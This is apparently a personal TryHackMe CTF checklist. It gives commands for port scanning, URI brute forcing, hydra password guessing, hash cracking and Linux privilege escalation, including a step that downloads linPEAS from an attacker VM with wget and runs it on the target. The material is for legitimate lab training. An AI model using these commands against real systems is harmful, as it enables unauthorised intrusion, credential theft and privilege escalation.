TryHackMe | CTF resolution steps

This article comprises some steps that I make when trying to solve some CTF on THM.

Friendly reminder: The following steps are not absolute. There are most of the times better ways to achieve the same goal. The list I managed to achieve comes from lots of try-and-error, but also mistakes that I managed to learn from.

As I am truly eager to keep learning more about cyber security, but also get more creative while solving CTFs, I will try to improve this list in the best way possible. Nonetheless, feel free to pop out suggestions 🤓.

Enumeration

1. Use nmap to see which ports are open;

nmap -sCV $IP_ADDRESS

2. Try to log any request/response headers from the web server (if any) to find any clues about next steps;

3. If there is a web server exposed, you can execute gobuster to brute force URIs;

gobuster dir -u http://$IP_ADDRESS
  \ -x html,txt,js,py,php 
  \-w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

4. If, for some reason you need to brute-force passwords, you can use hydra. Here’s an example:

hydra -l username -P /usr/share/wordlists/rockyou.txt -vV $IP_ADDRESS service

Just a quick note. If you are using a different password input file, bear in mind that you may have duplicate entries.

sort $filename | uniq > filename_with_no_duplicates.txt

5. To crack hashes, you can use hashcat or john.

# using hashcat
# match the hash prefix with https://hashcat.net/wiki/doku.php?id=example_hashes
echo "hash-example" > hash
hashcat -a -m $HASH_CAT_MODE hash /usr/share/wordlists/rockyou.txt

# using john
echo "hash-example" > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Privilege escalation

1. If you have access to a particular server, try to list all the command you are allowed to execute as a user;

sudo -l

2. Based on the commands you can run, you can search some gtfos and bypass security restrictions;

3. Access the cron jobs in /etc/crontab. Sometimes, it can have custom scripts that will be able to run as root, or will be able to access different users from the server;

4. Search for SUID executable files

find / -type f -perm -u=s 2>/dev/null

5. Use linPEAS to enumerate potential ways to escalate privileges;

# From the attacking VM
cd $LINPEAS_EXECUTABLE_PATH
python3 -m http.server 9000

# From the CTF machine
wget $ATTACKING_VM_IP:9000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# Save the result and show it with colors
./linpeas.sh > result_linpeas.txt 
less -R  result_linpeas.txt